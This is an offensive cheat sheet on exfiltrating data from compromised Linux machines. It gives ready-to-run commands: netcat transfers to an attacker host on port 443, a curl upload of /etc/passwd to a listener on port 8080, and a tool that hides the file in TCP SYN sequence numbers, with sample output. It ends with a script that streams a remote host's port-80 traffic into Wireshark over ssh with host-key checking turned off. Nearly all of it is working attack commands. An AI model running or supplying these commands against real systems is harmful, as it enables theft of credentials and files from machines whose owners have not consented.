Data Exfiltration in Linux
Raw data exfiltration through port 443
On target machine:
nc -nvv $IP 443 < input.txt
On attacker machine:
nc -nvlp 443 > input.txt
HTTP POST data exfiltration through port 8080
On target machine:
curl -T /etc/passwd http://$IP:8080
On attacker machine:
nc -nvlp 8080 | tee passwd
Data exfiltration using TCP SYN
We can use TCP SYN sequence number packets to exfiltrate data:
$ ./syn-file -i eth0 -d 192.168.1.158 -f /etc/passwd -p 8080 -P 8081 -m 00:0C:0A:4a:3b:5c using interface: eth0 #1 [Read from file "at:x"] [Encoded SEQ #: 0x61743a78] [Wrote 74 bytes] #2 [Read from file ":25:"] [Encoded SEQ #: 0x3a32353a] [Wrote 74 bytes] #3 [Read from file "25:B"] [Encoded SEQ #: 0x32353a42] [Wrote 74 bytes] #4 [Read from file "atch"] [Encoded SEQ #: 0x61746368] [Wrote 74 bytes] #5 [Read from file " job"] [Encoded SEQ #: 0x206a6f62] [Wrote 74 bytes] #6 [Read from file "s da"] [Encoded SEQ #: 0x73206461] [Wrote 74 bytes] #7 [Read from file "emon"] [Encoded SEQ #: 0x656d6f6e] [Wrote 74 bytes] #8 [Read from file ":/va"] [Encoded SEQ #: 0x3a2f7661] [Wrote 74 bytes] #9 [Read from file "r/sp"] [Encoded SEQ #: 0x722f7370] [Wrote 74 bytes] #10 [Read from file "ool/"] [Encoded SEQ #: 0x6f6f6c2f] [Wrote 74 bytes] [...]
Mirror target traffic on port 80 to a remote host
#!/bin/bash sudo su -c "mkfifo /tmp/sharkfin" sudo su -c "chmod 777 /tmp/sharkfin" sudo su -c "wireshark -k -i /tmp/sharkfin &" ssh -i ~/.ssh/id_ssh -o StrictHostKeyChecking=no -p 22 [email protected] "tcpdump -U -s0 -w - -i eth0 'port 80'" > /tmp/sharkfin
